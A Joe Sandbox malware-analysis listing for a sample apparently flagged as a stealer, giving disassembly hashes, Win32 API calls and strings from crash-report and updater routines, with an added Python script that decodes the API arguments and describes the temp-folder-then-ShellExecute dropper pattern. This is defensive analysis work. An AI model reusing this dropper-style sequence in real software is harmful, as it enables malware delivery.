                                                                                                                          • Instruction ID: d200151527c3ede6c963a6fd81d2bcaa2a913598f9f245dcc25d2414a1db5346
                                                                                                                          • Opcode Fuzzy Hash: 21889302f5840bb7ab53128212c91d3311c6d7f0053f2b3a8f94f3b4a8a5437f
                                                                                                                          • Instruction Fuzzy Hash: 2DF1E571A0026A8FDB64CF68D980BECB7B1FB59310F1086EAD55DE7640E630AE85DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0c9eb40ad593728ae2754647a4ed9005d480bf9afd466201d54975c9af8073b5
                                                                                                                          • Instruction ID: a5c3a312bf1fe4c14b54e25d18dd4126840e86ac2cb8fe1d1bd2c1fee9f96907
                                                                                                                          • Opcode Fuzzy Hash: 0c9eb40ad593728ae2754647a4ed9005d480bf9afd466201d54975c9af8073b5
                                                                                                                          • Instruction Fuzzy Hash: 7DB115B1604B10CFD335CF1AD480A22B7F0FF49715B258A5ED4AACBA92DB31E946CB51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d7802d03d07c65466fed54442172ee2d86165aea92b79098b3d515884ea7985a
                                                                                                                          • Instruction ID: bcc7866b49dceb45a487a7e3fc134a9f8f8e72a397ad8d87ed6c32c0c53b7895
                                                                                                                          • Opcode Fuzzy Hash: d7802d03d07c65466fed54442172ee2d86165aea92b79098b3d515884ea7985a
                                                                                                                          • Instruction Fuzzy Hash: 3C516132A543248B979CEFF8EC96BAF3603B790304386813EE507D7462DE34454AA685
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a892f9c8bc44d9b2aec206dc2c76e630b5306d5f2d46f9cf40c9349360f7de0
                                                                                                                          • Instruction ID: 54702253475054811ea91375307b4dd8e813b9a81deb1e604bb1a4fde44e389b
                                                                                                                          • Opcode Fuzzy Hash: 7a892f9c8bc44d9b2aec206dc2c76e630b5306d5f2d46f9cf40c9349360f7de0
                                                                                                                          • Instruction Fuzzy Hash: BD51BDB3E207214BDB18EFF9DD8A71E3653B7D030034A822CE905C762ADE70854BA685
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08791dfb26926cac5f0c6bd1f6e81629a3933a022b3e51425b7a17bd731aad3e
                                                                                                                          • Instruction ID: fa504434798449355d9e689d0330cc227b7002c0ea1c3a7d5937a2ffb90bd752
                                                                                                                          • Opcode Fuzzy Hash: 08791dfb26926cac5f0c6bd1f6e81629a3933a022b3e51425b7a17bd731aad3e
                                                                                                                          • Instruction Fuzzy Hash: 97518272D0011AEFDF04CF99C891AEEBBB2FF48314F19805DE925AB241D7349A50DB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6508406abe7609893afd75ea7bb46a8e2b3e6274f3aa2b338d8a4e1c01fce627
                                                                                                                          • Instruction ID: eccf303ef23ea4f9b7b2c50291ee40e40dffccfe6f6b36c7feab47c1f6cc1151
                                                                                                                          • Opcode Fuzzy Hash: 6508406abe7609893afd75ea7bb46a8e2b3e6274f3aa2b338d8a4e1c01fce627
                                                                                                                          • Instruction Fuzzy Hash: A141A277B865550BC72C8E3898703BAB7E39BD624170DC53DDCE297748EA219F448284
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction ID: 5b2bf14ad3e241bb380980b9a191b8c89bccaf350f488bccfa17ad64860014da
                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                          • Instruction Fuzzy Hash: 79110B7724008243D6348AEDF4F45BA9795EAD632072D437DD0A98B75AD2629A47B500
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0d810e0b9deb36ff65d62c3006b06995bec8f02f4f5d0a40ae685987b8664e8d
                                                                                                                          • Instruction ID: 50f6ed773b61f3fc227b7d18f8db406512775060f9bef5d7d4ddf2e5f67b920e
                                                                                                                          • Opcode Fuzzy Hash: 0d810e0b9deb36ff65d62c3006b06995bec8f02f4f5d0a40ae685987b8664e8d
                                                                                                                          • Instruction Fuzzy Hash: 232178315340F14A870D873AAC61637BF909B4730338B42AFE9ABEA1D2C529D564DBB0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6a6cf738af90754526f07f238ba3664dae4d81364b6edb0625e48981d956f27c
                                                                                                                          • Instruction ID: ab2230d27d0cb130e90570bc6114c9c1a378f9595119948f19f5ea268804cb8e
                                                                                                                          • Opcode Fuzzy Hash: 6a6cf738af90754526f07f238ba3664dae4d81364b6edb0625e48981d956f27c
                                                                                                                          • Instruction Fuzzy Hash: AC0124B29283458BC754FFB9DD86B0FB653BF8032434AC76DD2158146ACE388409AA59
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,4641B5ED,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA16
                                                                                                                          • lstrcatW.KERNEL32(?,MCCrashDump\,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA30
                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA50
                                                                                                                          • wsprintfW.USER32 ref: 00C1FA99
                                                                                                                            • Part of subcall function 00C23951: GetFileAttributesW.KERNEL32(?,00000001,00C2393B,?,?,?,?,?,?,?,?,?,00000354,00C15963), ref: 00C2395D
                                                                                                                          • lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FAC9
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FAD2
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000206,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB14
                                                                                                                          • lstrcpyW.KERNEL32(?,Unknown,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB2A
                                                                                                                          • lstrcpyW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB3F
                                                                                                                          • lstrcpyW.KERNEL32(00000000,ErrorLog.txt,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB58
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,80000080,00000000), ref: 00C1FB70
                                                                                                                          • OutputDebugStringW.KERNEL32(Error creating exception report,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FB88
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,00C19959), ref: 00C1FBAF
                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C1FBF6
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,0000040E), ref: 00C1FC12
                                                                                                                          • wsprintfW.USER32 ref: 00C1FCCD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$lstrcpy$ModuleNamewsprintf$AttributesCreateDebugLocalOutputPathPointerQueryStringTempTimeVirtuallstrcatlstrlen
                                                                                                                          • String ID: ===== [end of %s] =====$Bytes at CS:EIP:$ /auto$" "$%02x $%s caused %s (0x%08p) in module %s at %04p:%08p.$%s location %08x caused an access violation.$%s%d-%02d-%02d-%02d%02d%02d\$ASUSWSShellExt$Crash$Error creating exception report$ErrorLog.txt$Exception handler called in %s.$MCCrash.dmp$MCCrashDump\$MultiCrashReport.exe$Read from$The crash was caused by : %sYou should uninstall the ASUS shell extension.Or reinstall a new version that you download from AS$Unknown$Write to
                                                                                                                          • API String ID: 366537910-80639023
                                                                                                                          • Opcode ID: 17a4545208286d4d37a3c4151a02942522e97ff198742348f9095cc365bd8161
                                                                                                                          • Instruction ID: 10bb12c370a7f9fdd5e043a9a5cc8d602287f682f21238d24624f56b6d1d069b
                                                                                                                          • Opcode Fuzzy Hash: 17a4545208286d4d37a3c4151a02942522e97ff198742348f9095cc365bd8161
                                                                                                                          • Instruction Fuzzy Hash: 77F140B1900628AFDB24EB60DC89FEE77BCAB09714F0045A6F509E2191DB749F85DF60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C159A2
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00C159F8
                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000104), ref: 00C15A07
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00C15A86
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00CAE150,00CAE150,00000005), ref: 00C15AAD
                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00C15AB8
                                                                                                                          • PostMessageW.USER32(00000000,00008154,00000000,00000000), ref: 00C15ACC
                                                                                                                            • Part of subcall function 00C15588: __EH_prolog3_GS.LIBCMT ref: 00C1558F
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                            • Part of subcall function 00C24510: __EH_prolog3_catch.LIBCMT ref: 00C24517
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C2452A
                                                                                                                            • Part of subcall function 00C24510: GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00C2455A
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,00CB038C,?,?), ref: 00C2457C
                                                                                                                            • Part of subcall function 00C24510: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00C245A7
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000000,?,?,?,?,00000354,00C15963), ref: 00C245B9
                                                                                                                            • Part of subcall function 00C24510: GetUserDefaultLangID.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,00000354,00C15963), ref: 00C245D4
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00C15EC3
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00C15F97
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C15FA8
                                                                                                                          • Sleep.KERNEL32 ref: 00C16010
                                                                                                                          Strings
                                                                                                                          • Backup existing version to %s, xrefs: 00C15C6A
                                                                                                                          • Failed to unpack %s Update..., xrefs: 00C15F25
                                                                                                                          • Update FAILED., xrefs: 00C15FE1
                                                                                                                          • Unzip update into "%s"., xrefs: 00C15EDD
                                                                                                                          • Failed to create backup folder : %s, xrefs: 00C15CAC
                                                                                                                          • Running Installer..., xrefs: 00C15A6A
                                                                                                                          • Unpacking %s Update..., xrefs: 00C15E0C
                                                                                                                          • Remove temporary file : "%s", xrefs: 00C15F72
                                                                                                                          • Updating %s..., xrefs: 00C15FB2
                                                                                                                          • Backup completed., xrefs: 00C15D18
                                                                                                                          • Backuping existing version., xrefs: 00C15AF8
                                                                                                                          • Saving installer to temp folder...., xrefs: 00C15A4B
                                                                                                                          • Saving update file to : "%s"., xrefs: 00C15DF3
                                                                                                                          • Create folder : "%s"., xrefs: 00C15E9D
                                                                                                                          • Finished..., xrefs: 00C15FE6, 00C15FF4
                                                                                                                          • %d.%d.%d.%d, xrefs: 00C15C11
                                                                                                                          • Turn off Backup setting if you want to Upgrade without doing a backup, xrefs: 00C15CB9
                                                                                                                          • open, xrefs: 00C15AA5
                                                                                                                          • Downloaded completed..., xrefs: 00C159BC
                                                                                                                          • Failed to copy existing version to backup. Turn off Backup setting if you want to Upgrade without doing a backup, xrefs: 00C15CF0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$File$DefaultH_prolog3_InfoLangPathQueryUserValueVersion$CreateDeallocateDeleteDirectoryExecuteH_prolog3_catchLongMessageNamePostShellSizeTemp
                                                                                                                          • String ID: %d.%d.%d.%d$Backup completed.$Backup existing version to %s$Backuping existing version.$Create folder : "%s".$Downloaded completed...$Failed to copy existing version to backup. Turn off Backup setting if you want to Upgrade without doing a backup$Failed to create backup folder : %s$Failed to unpack %s Update...$Finished...$Remove temporary file : "%s"$Running Installer...$Saving installer to temp folder....$Saving update file to : "%s".$Turn off Backup setting if you want to Upgrade without doing a backup$Unpacking %s Update...$Unzip update into "%s".$Update FAILED.$Updating %s...$open
                                                                                                                          • API String ID: 3121452689-2531768170
                                                                                                                          • Opcode ID: 0e9ee5247b425699b137dcb4c43c6a2d51e74d903f5c1850576683d69d4952d7
                                                                                                                          • Instruction ID: 52cb34c6439fd70f31c978137c5c9b4c62c7b1de52223ba16c02f611c5625e47
                                                                                                                          • Opcode Fuzzy Hash: 0e9ee5247b425699b137dcb4c43c6a2d51e74d903f5c1850576683d69d4952d7
                                                                                                                          • Instruction Fuzzy Hash: C4025971901229EFDB24EBA0CC9AFE9B778AF55304F2040EAE00967192DB715F84EF51
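                                                                                                                          The crash-report listing above (GetTempPathW with 00000104, CreateFileW with 40000000 / 00000002 / 80000080, VirtualQuery with 0000001C) and the updater listing (Sleep with 000003E8, ShellExecuteW with "open" and 00000005) print every Win32 argument as raw hex, and the IDA plugin also prints stack slots beyond a function's declared parameters, which are caller residue rather than arguments. The following Python is an added example, not part of the Joe Sandbox report or of the analysed binary: it parses lines in that format, trims each call to its declared arity and names the constants. The six sample lines are copied from the two listings above; the last CreateFileW line is constructed to show a read-only existence probe. The ARITY table, the regular expressions and all function names are this example's own choices.

```python
"""Decode the argument columns of a Joe Sandbox IDA-plugin API listing."""
import re

# Win32 constants (winnt.h / winbase.h / winuser.h).
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
         0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
         0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x20000000: "FILE_FLAG_NO_BUFFERING",
         0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
SHOWCMD = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 5: "SW_SHOW"}
# Declared parameter counts (this example's own table): anything the plugin
# prints past these positions is stack residue and is dropped.
ARITY = {"CreateFileW": 7, "ShellExecuteW": 6, "Sleep": 1, "GetTempPathW": 2,
         "VirtualQuery": 3, "SetFilePointer": 4, "GetModuleFileNameW": 3,
         "lstrcatW": 2, "lstrcpyW": 2, "lstrlenW": 1, "OutputDebugStringW": 1}

LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")


def parse_line(line):
    """Return {api, module, args, ref, subcall} for an API line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    subcall, api, module, raw, ref = m.groups()
    args = []
    for tok in (raw.split(",") if raw else []):
        tok = tok.strip()
        # Eight hex digits are a stack dword; anything else is a string or '?'.
        args.append(int(tok, 16) if HEX_RE.fullmatch(tok) else tok)
    return {"api": api, "module": module, "ref": ref, "subcall": subcall,
            "args": args[:ARITY.get(api, len(args))]}


def bits(value, names):
    """Name each set bit in ascending bit order; unknown bits stay as hex."""
    if not isinstance(value, int):
        return ["?"]
    out = [n for b, n in sorted(names.items()) if value & b]
    rest = value & ~sum(b for b in names if value & b)
    if rest:
        out.append(hex(rest))
    return out


def decode(call):
    """Attach a 'decoded' dict for the calls whose arguments carry constants."""
    api, a = call["api"], call["args"]
    d = {}
    if api == "CreateFileW" and len(a) == 7:
        d = {"access": bits(a[1], ACCESS), "share": bits(a[2], SHARE),
             "disposition": DISPOSITION.get(a[4], repr(a[4])),
             "flags": bits(a[5], FLAGS)}
    elif api == "Sleep" and a and isinstance(a[0], int):
        d = {"ms": a[0]}
    elif api == "ShellExecuteW" and len(a) == 6:
        d = {"verb": a[1], "show": SHOWCMD.get(a[5], repr(a[5]))}
    elif api == "GetTempPathW" and a and isinstance(a[0], int):
        d = {"buffer_chars": a[0], "is_max_path": a[0] == 260}
    elif api == "VirtualQuery" and len(a) == 3:
        # 0x1C is sizeof(MEMORY_BASIC_INFORMATION) for a 32-bit process.
        d = {"length": a[2], "mbi32_sized": a[2] == 0x1C}
    call["decoded"] = d
    return call


def analyze(lines):
    """Parse and decode every API line; non-API lines are skipped."""
    return [decode(c) for c in map(parse_line, lines) if c]


# First six lines copied from the report's crash-report and updater listings;
# the last CreateFileW line is constructed (read-only probe, fake ref address).
SAMPLE = [
    r"• GetTempPathW.KERNEL32(00000104,?,4641B5ED,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA16",
    r"• lstrcatW.KERNEL32(?,MCCrashDump\,?,?,?,?,?,?,00C6FAE0,00CB9540,000000FE,?,00C19959), ref: 00C1FA30",
    r"• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,80000080,00000000), ref: 00C1FB70",
    r"• VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C1FBF6",
    r"• Sleep.KERNEL32(000003E8), ref: 00C15A86",
    r"• ShellExecuteW.SHELL32(00000000,open,?,00CAE150,00CAE150,00000005), ref: 00C15AAD",
    r"• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00000000",
]

if __name__ == "__main__":
    for c in analyze(SAMPLE):
        print(f"{c['ref']} {c['api']:<18} {c['decoded'] or c['args']}")
```

                                                                                                                          Run as a script it prints one decoded call per line: the crash reporter opens its ErrorLog.txt with GENERIC_WRITE, no sharing, CREATE_ALWAYS and FILE_FLAG_WRITE_THROUGH, and the updater sleeps one second and then ShellExecutes "open" with SW_SHOW on the file it just saved under the temp path. Nothing in these listings is stealer behaviour; the strings name an ASUS shell-extension crash reporter and a backup-and-unzip updater, so signatures cut from these routines would likely match the host program rather than the LummaC payload flagged in the overview. The write-to-%TEMP%-then-ShellExecute sequence is still the pattern a dropper detection keys on, whichever component performs it.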
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 00C16ED3
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C16F1A
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C17301
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C1731F
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C1733B
                                                                                                                          • _Deallocate.LIBCONCRT ref: 00C17357
